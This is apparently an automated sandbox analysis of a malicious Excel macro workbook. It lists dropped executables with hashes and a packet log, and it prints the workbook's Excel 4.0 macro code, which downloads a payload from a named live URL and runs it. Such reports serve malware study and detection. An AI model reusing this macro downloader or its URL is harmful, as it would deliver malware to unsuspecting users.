                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):741995
                                                                                                    Entropy (8bit):4.7473139310932195
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:Gb6aZQWqNNmRTKHkZnmHgl1gW9oLeN53f9Pa3JLkK9BOsJ:Gb6afqNNmRnZn79oKpCZL99h
                                                                                                    MD5:A19EB2AF842C2181E97A503707784E49
                                                                                                    SHA1:D31776ECE6747E05C2D1ADD21813FC5A2CC4B82C
                                                                                                    SHA-256:28F7B47F0A1BBC4037B9E177529FAE56DB286FBC44FEB310DD88603AEA9A7B08
                                                                                                    SHA-512:8EC63B04CC8C9CF7DB84110B3E0342AB880EECD5446C525C9C75199C30E0D9A92B55D9E117DADF3FB2B58698B0686DD57663FC3C21AB386E248D41BE5DDDCEBC
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..
                                                                                                    C:\Users\user\AppData\Local\Temp\6F910000
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17381
                                                                                                    Entropy (8bit):7.264686923554434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:LYqhYs7wu2+SlzY/7ksWuiMEi0pdzG7pIA7BnAyc/:7es7wNtzY/b/iMIz8pIANnAyc/
                                                                                                    MD5:3B3C0579601FACAFBD5CAE5871864B3A
                                                                                                    SHA1:DB051BA82B335D1296283D1F3713A1F5F60D753A
                                                                                                    SHA-256:4F8D7A6B17AC84B0654DB0F99E5C37F58DF2E3C2AB93E96A123F16BA6E82DCE7
                                                                                                    SHA-512:1E51D6CB214A061F736D02736A8575EE70B83C5C27F1BA57BBEDB392056F73C162EAF15BED4853C8472057036BD0FDB68FC78353FFADF8396ABE2E16734AC3C1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .U.n.0....?..........C....I?.&..an.L...;..............pz..y..6.^\t..@...0....M.E4H*..b.^........:.6\...#Q.*%.....&.<...+..<..R. /'..R.@....!f..P......o..m...w...*%g.".*..yE....j0Q?z..0eP.G..K.2c.."6.B..Lax.i}.\..Wdpx..m..WV+8..8.7....9l.~..fk..S.n..........a.....V.\W...9^.5w.s.....j%.z........W.T.#:..S....>.....K..@....W.#.....n@.1.*..'...........s. .....:..]....83...K.).mb .da.u....#w...J[7`.p.z..~.......PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Mon Jan 25 17:23:31 2021, atime=Mon Jan 25 17:23:31 2021, length=12288, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):904
                                                                                                    Entropy (8bit):4.644950793627764
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:8eXUhtuElPCH2Aivb9cX+WrjAZ/2bDYUmnRLC5Lu4t2Y+xIBjKZm:8ZQiBcBAZiDUnI87aB6m
                                                                                                    MD5:4770F5BB80BF5889E8E10D8B597E19A8
                                                                                                    SHA1:FE938E245152A576834CAF55E37E5C487F999E92
                                                                                                    SHA-256:E2CDDBECAEEC1E728E82B55BB932C926ACD9B692F17836063919F8149C08C545
                                                                                                    SHA-512:0844CE30E4D9C1BDBC36CB87FD88BE9484AB4D898A638567AA5E2EE0D986F36D484AB423EF4CCCF455314100D91FB4AC967F9B03CBC080F2E6315F211B82E312
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: L..................F........N....-...e\/G....e\/G....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..9R.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.9R......S....................$...h.a.r.d.z.....~.1.....9R...Desktop.h.......Ny.9R......Y..............>.......:.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......141700...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):299
                                                                                                    Entropy (8bit):4.7570137735443145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:djYOWwrpmHWwrpmOWwrpmHWwrpmOWwrpmHWwrpmOWwrpc:dMOWsmHWsmOWsmHWsmOWsmHWsmOWsc
                                                                                                    MD5:41D06DC056583FDF30DD901298348E41
                                                                                                    SHA1:6233DCDB67664B7B60D85836AFA188104853CB19
                                                                                                    SHA-256:2617DCDD1334A666016A28DC5AA4CEE89FEF0A9476FDF51FDBEAFB67A6F688AA
                                                                                                    SHA-512:FEB4CC703A4C5EDF12B5213429C74B54472CF31C19B3AF052AD4E09F0C206D7A43FD3B0325E4449FC492DCFE8F7E7C44A6BE559544782E04FC717DBE45806FF5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: Desktop.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\request_form_1611565093.xlsm.LNK
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Mon Jan 25 17:23:31 2021, atime=Mon Jan 25 17:23:31 2021, length=17381, window=hide
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4500
                                                                                                    Entropy (8bit):4.7103504144745445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:83HW+w1WB0B6p3HW+w1WB0B6p7iW+w1WB0B6p7iW+w1WB0B6:8XtB0KXtB0K7itB0K7itB0
                                                                                                    MD5:C017DA4D8CB6EE9FB276ADC4E484194D
                                                                                                    SHA1:1CE97DEDE19B793354B2CCF4530EBF9A9153BE53
                                                                                                    SHA-256:06E16E735F0AEE181A4F45C8FCF7D935290B078320B7CBD8FA439361A6D2A43C
                                                                                                    SHA-512:CF5958D3FB9C482E3AF7AB1ABDAF32FAE1354DCB5F7A62173649E2EDB53CFB899D71187558A0B3401CFDBCDEEED6C04D1720BC7368B0E48A8E3F3B6E02C0A316
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview: L..................F.... .......:...w*a/G...w*a/G....C...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..9R.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.9R......S....................$...h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny.9R......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..D..9R. .REQUES~1.XLS..j......>Qvx9R.....h......................)..r.e.q.u.e.s.t._.f.o.r.m._.1.6.1.1.5.6.5.0.9.3...x.l.s.m.......b...............-.......a...........>.S......C:\Users\user\Desktop\request_form_1611565093.xlsm..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.r.e.q.u.e.s.t._.f.o.r.m._.1.6.1.1.5.6.5.0.9.3...x.l.s.m.........:..,.LB.)...As...`.......X.......141700...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                    C:\Users\user\Desktop\10A10000
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17381
                                                                                                    Entropy (8bit):7.264686923554434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:LYqhYs7wu2+SlzY/7ksWuiMEi0pdzG7pIA7BnAyc/:7es7wNtzY/b/iMIz8pIANnAyc/
                                                                                                    MD5:3B3C0579601FACAFBD5CAE5871864B3A
                                                                                                    SHA1:DB051BA82B335D1296283D1F3713A1F5F60D753A
                                                                                                    SHA-256:4F8D7A6B17AC84B0654DB0F99E5C37F58DF2E3C2AB93E96A123F16BA6E82DCE7
                                                                                                    SHA-512:1E51D6CB214A061F736D02736A8575EE70B83C5C27F1BA57BBEDB392056F73C162EAF15BED4853C8472057036BD0FDB68FC78353FFADF8396ABE2E16734AC3C1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .U.n.0....?..........C....I?.&..an.L...;..............pz..y..6.^\t..@...0....M.E4H*..b.^........:.6\...#Q.*%.....&.<...+..<..R. /'..R.@....!f..P......o..m...w...*%g.".*..yE....j0Q?z..0eP.G..K.2c.."6.B..Lax.i}.\..Wdpx..m..WV+8..8.7....9l.~..fk..S.n..........a.....V.\W...9^.5w.s.....j%.z........W.T.#:..S....>.....K..@....W.#.....n@.1.*..'...........s. .....:..]....83...K.).mb .da.u....#w...J[7`.p.z..~.......PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Users\user\Desktop\~$request_form_1611565093.xlsm
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):495
                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1
                                                                                                    MD5:28C0C942161F749E335A76E714AACA29
                                                                                                    SHA1:53D07F227E4A2F3AF5373958409A19DE1FA1CF9C
                                                                                                    SHA-256:BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5
                                                                                                    SHA-512:075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE
                                                                                                    Malicious:true
                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    C:\msdownld.tmp\AS01A87F.tmp\victory.php
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):742003
                                                                                                    Entropy (8bit):4.747274159794167
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:Gb6aZQWqNNmRTKHkZnmHgl1gW9oLeN53f9Pa3JLkK9BOsJ:Gb6afqNNmRnZn79oKpCZL99h
                                                                                                    MD5:DC74FAE0ADA0A2426E77588E3797E040
                                                                                                    SHA1:956EB4FACF7A5BD5E35CFE97898B1D17FEC2643D
                                                                                                    SHA-256:C9AF52899F8EE20E384DE482B81CE82826AF9573C4A1A9C9B761B9C5126B2BB7
                                                                                                    SHA-512:6C4A2786E391D3B23495D2159C56D4C8A49EAC0D18F1FAF4820A1D4CF9C93A5DFEE01DE0D0FE5D9D302F8527061B55B34D650AD3C4704CD98D9962BA3E9603E2
                                                                                                    Malicious:true
                                                                                                    Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..
                                                                                                    C:\otrgh\sdgvjk\fdcbn.exe
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1483998
                                                                                                    Entropy (8bit):4.747294045359185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:Gb6afqNNmRnZn79oKpCZL99hNb6afqNNmRnZn79oKpCZL99h:haCNNoZn79odL5AaCNNoZn79odL5
                                                                                                    MD5:5F8F3F845956C9F1626A266B1A6A1B59
                                                                                                    SHA1:511BAAE261FC8616B208E267172C9E243E536594
                                                                                                    SHA-256:0F1C8D24AD9940ACE82975D7ECA8778E8A9010153E64DF4414A6489D05833B87
                                                                                                    SHA-512:916835E296FB4870E893042AEFF6621AF2464C5043FE05D2A818CA4C0E2A4C57F096FF3C8207A35F30628072E97A6F7DF4EB03E97BCFCF6B1984E02F43DEE76F
                                                                                                    Malicious:true
                                                                                                    Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:Microsoft Excel 2007+
                                                                                                    Entropy (8bit):7.272059464538998
                                                                                                    TrID:
                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                                    File name:request_form_1611565093.xlsm
                                                                                                    File size:17535
                                                                                                    MD5:9c47eef4c66e4587ecddb55cfc3ef1e6
                                                                                                    SHA1:da444ad39f513282d1918beceadc0ceb6edc0d3d
                                                                                                    SHA256:042b7d9208258a1a64b9a1ab0079e1bb7898a3b787167457951b810e9b126dd1
                                                                                                    SHA512:37d43fadd6bb4274c15f5c4c339b00d961f7fdd1590e1a05e24bc4564118cdedc5bdd349b984fba8402b3801b57b440d7a152ac94e573351c2a2fb2d57877099
                                                                                                    SSDEEP:384:rdUK4U2aGcIrbnqtcwiMEO81+dAM3SbTz:ZUVaGcIrbnyviMR81+yj
                                                                                                    File Content Preview:PK..........!.................[Content_Types].xml ...(.....................!!..................................................................................................................................................................................

                                                                                                    File Icon

                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                    Static OLE Info

                                                                                                    General

                                                                                                    Document Type:OpenXML
                                                                                                    Number of OLE Files:1

                                                                                                    OLE File "request_form_1611565093.xlsm"

                                                                                                    Indicators

                                                                                                    Has Summary Info:
                                                                                                    Application Name:
                                                                                                    Encrypted Document:
                                                                                                    Contains Word Document Stream:
                                                                                                    Contains Workbook/Book Stream:
                                                                                                    Contains PowerPoint Document Stream:
                                                                                                    Contains Visio Document Stream:
                                                                                                    Contains ObjectPool Stream:
                                                                                                    Flash Objects Count:
                                                                                                    Contains VBA Macros:

                                                                                                    Macro 4.0 Code

                                                                                                    ,,,,,,,,,,,,,,,,,,,,,=RUN(V2),,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,""JCJ"",'Doc2'!AD15,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,""JCJ"",'Doc2'!AD15&'Doc2'!AD19,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,""JJCCJJ"",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""INSENG"",""DownloadFile"",""BCCJ"",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,""JJCCCCJJ"",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(V1),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://japort.com/suret/victory.php,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 25, 2021 10:23:32.070090055 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.227945089 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:32.228055954 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.228924990 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.386797905 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:32.390645981 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:32.390700102 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:32.390722990 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.390734911 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:32.390758038 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.390782118 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.401439905 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.559773922 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:32.559885025 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.560631037 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:32.759342909 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171098948 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171173096 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171221972 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171263933 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171300888 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171334982 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.171339035 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171370029 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171407938 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171418905 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.171447992 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171485901 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.171487093 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.171541929 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.171597958 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.329364061 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329463005 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329500914 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329540968 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329580069 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329617023 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329654932 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329691887 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329739094 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329780102 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329817057 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329854012 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329854012 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.329893112 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329909086 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.329931974 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329932928 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.329971075 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.329981089 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.330007076 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.330010891 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.330039978 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.330061913 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.330076933 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.330105066 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.330123901 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.330144882 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.330162048 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.330184937 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.330203056 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.330245018 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.487833023 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.487871885 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.487919092 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.487963915 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488004923 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488032103 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488044977 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488064051 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488070011 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488074064 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488089085 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488095045 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488128901 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488157034 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488169909 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488181114 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488212109 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488225937 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488260031 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488262892 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488302946 CET4434972250.87.232.245192.168.2.3
                                                                                                    Jan 25, 2021 10:23:33.488312006 CET49722443192.168.2.350.87.232.245
                                                                                                    Jan 25, 2021 10:23:33.488341093 CET4434972250.87.232.245192.168.2.3
